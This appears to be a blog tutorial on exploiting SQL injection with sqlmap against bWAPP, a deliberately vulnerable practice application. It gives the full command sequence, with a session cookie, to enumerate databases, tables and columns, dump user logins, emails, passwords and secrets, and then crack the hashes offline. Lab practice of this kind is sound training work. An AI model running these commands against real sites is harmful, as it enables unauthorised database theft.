Exploiting SQL Injection with SQLmap

Hi, one tool I really like to use for exploiting SQLi is SQLmap. It is available here @ http://sqlmap.org/ and is also part of many distros such as Kali Linux and SamuraiWTF. It is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.

To demonstrate this powerful tool we will use bWAPP, the deliberately insecure web application. You can find more information here http://www.mmeit.be/bwapp/. bWAPP has over 70 vulnerabilities that you can use to sharpen your skills without fear of going to jail :)

Before we begin the demo we must first try and  understand what SQL Injection is. This type of attack occurs when an application takes untrusted data that is sent to an interpreter, in this case the database as part of a query. The attackers hostile data may then trick the interpreter into executing unintended commands. If untrusted data is used to construct SQL calls then the attacker will be able to modify the query to return data.

In order to protect against this attack developers must validate and escape the hostile data before it reaches the interpreter. This can be done using prepared statements or parametrized queries. I will go into SQLi in more detail in a later post.

So we have our vulnerable bWAPP page below. We know it is vulnerable because we have injected a single quote into the input field and it has returned a SQL error. From this we can deduce that the database is interpreting characters without proper validation.

If you look at the request below you will see that title is the vulnerable parameter, so this the one we must concentrate our attack on.

http://itsecgames.com/bWAPP/sqli_1.php?title='&action=search


The next thing to do is fire up SQLmap. For this demo I am using Kali Linux but you can run it in Windows or another distro. In Kali you can open up a terminal and simply type sqlmap. There are a lot of useful options in sqlmap you can check them out here https://github.com/sqlmapproject/sqlmap/wiki/Usage

The can now try and return some information. The command below will return all of the available database. The -u switch is the URL (note with the vulnerable title parameter), the cookie and the --dbs for enumerating the databases. I used the FireFox addon Cookie Manager to retrieve the cookie information but you can also run ZaProxy or Burp Suite to capture that information.

sqlmap -u "http://itsecgames.com/bWAPP/sqli_1.php?title=" --cookie="PHPSESSID=780b97cfb3fee59b69f7d4e0345428cd;security_level=0" --dbs

We can see above that it has returned 3 databases. We can also return the current database users by using the command below:

sqlmap -u "http://itsecgames.com/bWAPP/sqli_1.php?title=" --cookie="PHPSESSID=780b97cfb3fee59b69f7d4e0345428cd;security_level=0" --users

Ok lets return the tables in the bWAPP database.The -D switch is for database and --tables returns the tables

sqlmap -u "http://itsecgames.com/bWAPP/sqli_1.php?title=" --cookie="PHPSESSID=780b97cfb3fee59b69f7d4e0345428cd;security_level=0" -D bWAPP --tables

We can see that there are 4 tables returned, the users table looks interesting so lets go a step further and return the columns from the users table.

sqlmap -u "http://itsecgames.com/bWAPP/sqli_1.php?title=" --cookie="PHPSESSID=780b97cfb3fee59b69f7d4e0345428cd;security_level=0" -D bWAPP -T users --columns

The last step for us is to dump out the data from the columns. You can select the interesting ones or dump all.

sqlmap -u "http://itsecgames.com/bWAPP/sqli_1.php?title=" --cookie="PHPSESSID=780b97cfb3fee59b69f7d4e0345428cd;security_level=0" -D bWAPP -T users -C login,email,password,secret --dump

We can also work on cracking the password hashes offline. So there you have it, a really useful tool for speeding up the exploitation of SQL Injection vulnerabilities.